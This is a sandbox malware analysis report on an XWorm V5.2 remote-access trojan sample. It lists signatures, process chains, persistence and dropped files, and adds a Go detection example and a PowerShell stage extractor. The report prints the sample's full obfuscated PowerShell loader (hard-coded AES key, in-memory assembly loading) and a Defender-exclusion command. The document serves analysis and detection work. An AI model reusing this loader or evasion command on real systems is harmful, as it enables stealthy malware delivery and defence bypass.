Malware Analysis Report

2024-11-15 08:36

Sample ID 240905-af3h1szfme
Target XWorm V5.2.exe
SHA256 c39cc9aaa0311fd1f6d981e995b608b0d36e464aea09896bd17b41bbd3fc1fe6
Tags
execution xworm agilenet persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c39cc9aaa0311fd1f6d981e995b608b0d36e464aea09896bd17b41bbd3fc1fe6

Threat Level: Known bad

The file XWorm V5.2.exe was found to be: Known bad.

Malicious Activity Summary

execution xworm agilenet persistence rat trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

Xworm

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Deletes itself

Obfuscated with Agile.Net obfuscator

Executes dropped EXE

Drops startup file

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Looks up external IP address via web service

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx
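The entries above are the sandbox's signature names; the concrete indicators sit in the command lines recorded under behavioral1 / Processes further down. The loader there hides its method names by writing them backwards and reversing them at run time ('gnirtS46esaBmorF'[-1..-16] -join '' evaluates to FromBase64String), so a string match on the raw command line misses the Base64, Assembly.Load and ReadAllText calls. The Go program below is an added example written for this page, not code from the sandbox vendor or from the sample: it folds that reversal idiom back into plain literals and then checks a small indicator table against the three command-line shapes this report records. The indicator names are this example's own; the sample command lines are copied from the report, with the loader line abridged to the fragments the matcher uses.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// reversedIdiom matches the loader's obfuscation of method names, e.g.
//   'gnirtS46esaBmorF'[-1..-16] -join ''
// which PowerShell evaluates at run time to the literal 'FromBase64String'.
var reversedIdiom = regexp.MustCompile(`'([^']*)'\[-1\.\.-(\d+)\] -join ''`)

// NormalizeCommandLine folds every such idiom back into the plain literal so
// that string indicators match what actually executes, not the disguise.
func NormalizeCommandLine(cmd string) string {
	return reversedIdiom.ReplaceAllStringFunc(cmd, func(m string) string {
		sub := reversedIdiom.FindStringSubmatch(m)
		r := []rune(sub[1])
		// [-1..-N] yields the last N characters reversed; the loader always
		// uses the full length, so anything else is left untouched.
		if n, _ := strconv.Atoi(sub[2]); n != len(r) {
			return m
		}
		for i, j := 0, len(r)-1; i < j; i, j = i+1, j-1 {
			r[i], r[j] = r[j], r[i]
		}
		return "'" + string(r) + "'"
	})
}

// indicator fires when every substring is present (case-insensitive) in the
// normalized command line. Names are this example's own, not the sandbox's.
type indicator struct {
	name string
	all  []string
}

var indicators = []indicator{
	{"defender-exclusion-added", []string{"add-mppreference", "-exclusionpath"}},
	{"executionpolicy-bypass", []string{"-executionpolicy bypass"}},
	{"script-echoed-through-cmd", []string{`cmd.exe /s /d /c" echo`}},
	{"in-memory-assembly-load", []string{"system.reflection.assembly", "'load'"}},
	{"aes-decrypt-in-script", []string{"system.security.cryptography.aes", "createdecryptor"}},
	{"gzip-decompress-in-script", []string{"gzipstream", "decompress"}},
}

// MatchIndicators returns the indicator names a command line triggers: the
// reversal idiom itself first, then the table in order.
func MatchIndicators(cmd string) []string {
	var hits []string
	if reversedIdiom.MatchString(cmd) {
		hits = append(hits, "string-reversal-obfuscation")
	}
	norm := strings.ToLower(NormalizeCommandLine(cmd))
	for _, ind := range indicators {
		ok := true
		for _, s := range ind.all {
			if !strings.Contains(norm, s) {
				ok = false
				break
			}
		}
		if ok {
			hits = append(hits, ind.name)
		}
	}
	return hits
}

// SampleCommandLines are copied from this report's behavioral1 Processes
// section; the third is the loader line abridged to the parts matched here.
var SampleCommandLines = []string{
	`"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'`,
	`cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "`,
	`C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $decryptor_var=$aes_var.CreateDecryptor(); }function decompress_function($param_var){ $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); }function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); }$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN); "`,
}

func main() {
	for _, c := range SampleCommandLines {
		fmt.Printf("%-90.90s\n  -> %v\n", c, MatchIndicators(c))
	}
}
```

The normalization step is the part worth copying into a real pipeline: it is cheap, it cannot change anything that is not already the loader's idiom (a slice shorter than the literal is left alone), and it turns a command line that defeats a plain "Assembly.Load" or "FromBase64String" search into one that does not.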

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-05 00:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-05 00:10

Reported

2024-09-05 00:20

Platform

win7-20240704-en

Max time kernel

359s

Max time network

360s

Command Line

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Events
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 22 (identical rows collapsed)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target Events
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 22 (identical rows collapsed)

Suspicious use of WriteProcessMemory

Identical rows are collapsed: every writer/target pair below occurs three times, except the last, where the listing ends. The Indicator column is N/A for every row. Images are abbreviated as XWorm V5.2.exe = C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe, powershell.exe = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, cmd.exe = C:\Windows\system32\cmd.exe.

Writer PID  Target PID  Events  Writer image -> Target image
2820        2596        3       XWorm V5.2.exe -> XWorm V5.2.exe
2820        2880        3       XWorm V5.2.exe -> powershell.exe
2820        2664        3       XWorm V5.2.exe -> cmd.exe
2596        2604        3       XWorm V5.2.exe -> XWorm V5.2.exe
2596        536         3       XWorm V5.2.exe -> powershell.exe
2664        2292        3       cmd.exe -> cmd.exe
2664        1984        3       cmd.exe -> powershell.exe
2596        2112        3       XWorm V5.2.exe -> cmd.exe
2112        2900        3       cmd.exe -> cmd.exe
2112        2928        3       cmd.exe -> powershell.exe
2604        1120        3       XWorm V5.2.exe -> XWorm V5.2.exe
2604        1728        3       XWorm V5.2.exe -> powershell.exe
2604        2056        3       XWorm V5.2.exe -> cmd.exe
2056        1632        3       cmd.exe -> cmd.exe
2056        1280        3       cmd.exe -> powershell.exe
1120        2488        3       XWorm V5.2.exe -> XWorm V5.2.exe
1120        2328        3       XWorm V5.2.exe -> powershell.exe
1120        1288        3       XWorm V5.2.exe -> cmd.exe
1288        1716        3       cmd.exe -> cmd.exe
1288        868         3       cmd.exe -> powershell.exe
2488        1412        3       XWorm V5.2.exe -> XWorm V5.2.exe
2488        948         1       XWorm V5.2.exe -> powershell.exe (listing ends here)

Grouped this way the rows form a single chain: each XWorm V5.2.exe writes into a fresh copy of itself (2820 -> 2596 -> 2604 -> 1120 -> 2488 -> 1412) and into one new powershell.exe and one new cmd.exe; each of those cmd.exe instances in turn writes into a further cmd.exe and a powershell.exe. Three writes per pair is the pattern for every pair shown.

Processes

The listing holds 45 process entries but only five distinct command lines: XWorm V5.2.exe keeps starting a fresh copy of itself, and every copy runs the same set of children (the PID chain is in the WriteProcessMemory rows above). The distinct entries, with the number of times each occurs in the listing:

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe (10 entries)

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (9 entries)

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe (9 entries)

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe (8 entries)

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (8 entries)

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

What the chain does:

The Add-MpPreference call registers a Microsoft Defender exclusion for the batch file before the batch file is run, with -ExecutionPolicy Bypass on the command line. It has an effect only where Microsoft Defender Antivirus and its PowerShell module are present; the report does not record whether the call succeeded on this Windows 7 image.

cmd /c ""...XWorm V5.2.bat" " runs a batch file dropped next to the sample under the sample's own base name.

The cmd.exe /S /D /c" echo ... " entry is that batch file echoing a PowerShell script, and in every group it is paired with a powershell.exe instance that carries no arguments at all. That is consistent with the script reaching PowerShell through a pipe on standard input: command-line logging of the powershell.exe process records nothing of the loader, so the script body has to be taken from the cmd.exe command line or from PowerShell Script Block Logging (event ID 4104).

The script itself is obfuscated only by writing method names backwards and reversing them at run time: 'gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'daoL'[-1..-4] -join '' is Load, and 'txeTllAdaeR'[-1..-11] -join '' is ReadAllText. Read forwards, it opens the .bat file itself ($sQwMN), takes the line that starts with the 20-character marker sgymnEOEMpmtiRUpGEhO, splits the remainder on '\', and for each part undoes a '#' to '/' and '@' to 'A' substitution, Base64-decodes, decrypts with AES-CBC and PKCS7 padding (the 32-byte key Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs=, so AES-256, and the 16-byte IV yPdScja9U8RjkyeOpTlzgQ== are both hard-coded in the command line), GZip-decompresses, and loads the result with System.Reflection.Assembly.Load, invoking its entry point. The first payload is run with no arguments, the second with a single empty string. The decrypted assemblies are never written to disk by this stage; because the key and IV are fixed, they can be recovered statically from the dropped .bat.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
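
Reading the cmd.exe entries above: the batch file echoes a PowerShell script into a powershell.exe that is started with no arguments, so the script arrives on stdin and the powershell.exe entries in this process list carry an empty command line. Detections keyed on the PowerShell command line will only ever see the cmd.exe /S /D /c" echo ... " launcher; Script Block Logging (event 4104) still records the body. The script's string obfuscation is one trick: method names are stored reversed and rebuilt with a negative range index, so 'gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'txeTllAdaeR'[-1..-11] is ReadAllText and 'daoL'[-1..-4] is Load. The loader reads its own .bat (the file whose hashes appear under Files below), finds the line that starts with the 20-character marker sgymnEOEMpmtiRUpGEhO, splits the rest on '\' into two blobs, undoes a custom base64 alphabet ('#' stands for '/', '@' for 'A'), decrypts with AES-CBC/PKCS7 under a hard-coded 32-byte key (AES-256) and 16-byte IV, gunzips the result and loads each stage in memory with Assembly.Load, invoking the first stage's entry point with no arguments and the second's with a single empty string. The decrypted stages never touch disk.

The script below is an added example, not part of the report and not the malware's own code: it re-implements the same pipeline with the marker, key and IV copied from the captured command line, but writes the decrypted stages to disk for static analysis instead of loading them. The script name Extract-XWormStages.ps1, the parameter names, the output directory and the payloadN.bin file names are the example's own choices.

```powershell
# Extract-XWormStages.ps1 (added example): offline extractor for the two-stage
# .bat loader captured in this report. Reproduces decode -> AES-CBC decrypt ->
# gunzip, then writes each stage to disk instead of calling Assembly.Load.
# Run only inside an isolated analysis VM.
param(
    [Parameter(Mandatory)][string]$BatPath,
    [string]$OutDir = (Join-Path (Split-Path -Parent $BatPath) 'extracted')
)

# Constants copied verbatim from the captured loader.
$Marker = 'sgymnEOEMpmtiRUpGEhO'                            # 20-char line prefix
$KeyB64 = 'Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='   # 32 bytes -> AES-256
$IvB64  = 'yPdScja9U8RjkyeOpTlzgQ=='                       # 16 bytes

function ConvertFrom-LoaderBase64 {
    # The loader swaps '/' for '#' and 'A' for '@' so the blob is not valid base64 as stored.
    param([string]$Blob)
    return ,([Convert]::FromBase64String($Blob.Replace('#', '/').Replace('@', 'A')))
}

function Unprotect-AesCbc {
    param([byte[]]$Data, [byte[]]$Key, [byte[]]$Iv)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key     = $Key
        $aes.IV      = $Iv
        $dec = $aes.CreateDecryptor()
        try {
            # A wrong key or IV normally surfaces here as a CryptographicException
            # ("Padding is invalid"), which is the quickest sign the constants changed.
            $plain = $dec.TransformFinalBlock($Data, 0, $Data.Length)
        } finally { $dec.Dispose() }
        return ,$plain
    } finally { $aes.Dispose() }
}

function Expand-GzipBytes {
    param([byte[]]$Data)
    $in  = [System.IO.MemoryStream]::new($Data)
    $out = [System.IO.MemoryStream]::new()
    $gz  = [System.IO.Compression.GZipStream]::new($in, [System.IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out) } finally { $gz.Dispose(); $in.Dispose() }
    $bytes = $out.ToArray()
    $out.Dispose()
    return ,$bytes
}

# Same lookup the loader performs on itself: first line that starts with the marker.
$payloadLine = [System.IO.File]::ReadAllLines($BatPath) |
    Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
if (-not $payloadLine) { throw "Marker line '$Marker' not found in $BatPath" }

$key = [Convert]::FromBase64String($KeyB64)
$iv  = [Convert]::FromBase64String($IvB64)
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null

# Two blobs separated by '\': stage 1 (invoked with no args), stage 2 (invoked with [''])
$blobs = $payloadLine.Substring($Marker.Length).Split('\')
for ($i = 0; $i -lt $blobs.Length; $i++) {
    $plain = Expand-GzipBytes (Unprotect-AesCbc (ConvertFrom-LoaderBase64 $blobs[$i]) $key $iv)
    # Assembly.Load expects a PE image, so a recovered stage should start with 'MZ'.
    $isPe = ($plain.Length -gt 2 -and $plain[0] -eq 0x4D -and $plain[1] -eq 0x5A)
    $outFile = Join-Path $OutDir ('payload{0}.bin' -f ($i + 1))
    [System.IO.File]::WriteAllBytes($outFile, $plain)
    $sha256 = (Get-FileHash -Algorithm SHA256 $outFile).Hash
    '{0}: {1} bytes, PE={2}, SHA256={3}' -f $outFile, $plain.Length, $isPe, $sha256
}
```

Usage: .\Extract-XWormStages.ps1 -BatPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat' from the analysis VM. The printed SHA256 values are the IOCs for the in-memory stages, which the sandbox cannot hash because they are never written to disk; the report's agilenet tag means the recovered assemblies will still need deobfuscation before they read cleanly. If a related sample has rotated the key, IV or marker, the extractor fails at the decrypt step rather than producing garbage, so update the three constants from that sample's command line.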

Network

N/A

Files

memory/2820-0-0x000007FEF5493000-0x000007FEF5494000-memory.dmp

memory/2820-1-0x0000000000CA0000-0x0000000001EE2000-memory.dmp

memory/2820-2-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

memory/2596-3-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

memory/2880-8-0x000000001B6A0000-0x000000001B982000-memory.dmp

memory/2880-9-0x0000000002970000-0x0000000002978000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat

MD5 1a270a2d79f958a83af1ab2b5805e43c
SHA1 aeb2f51a0d1377a25fdcd614fc96fe6b3afbbeeb
SHA256 5a0ee0516cf26c772261c81a9cbc45fa625268576debb7d8b38609687554544c
SHA512 00bec3f89f9f27236adf0167d6382b60a2be56bdb6b00aae0117396e30e77a993b97d2b7f2af3ae96b81bce0b55bf177d4c4d0c272df05d72c2dc55577b14191

memory/2820-20-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

memory/536-27-0x0000000001DC0000-0x0000000001DC8000-memory.dmp

memory/536-26-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EZ3IQV36WKD3F1BFXVG1.temp

MD5 93e39f76d77b580fa62d450532298270
SHA1 354372f4ed848fe8c790e8e6e700a595e002c828
SHA256 b833caf25d47174e317e35221ed2403bff6ac13af2d054ef654dd7ef745b32ae
SHA512 230a04565c3430e12963022e42b04ab725f8882ecf2c9edb6af61b50a985853eb2cc7e97434125003ccc46fa70330d263b7db3ce95e12d61d090fe9a2e2f3a6c

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2596-34-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-05 00:10

Reported

2024-09-05 00:11

Platform

win10v2004-20240802-en

Max time kernel

64s

Max time network

66s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch -p

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3124 created 5096 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\svchost C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
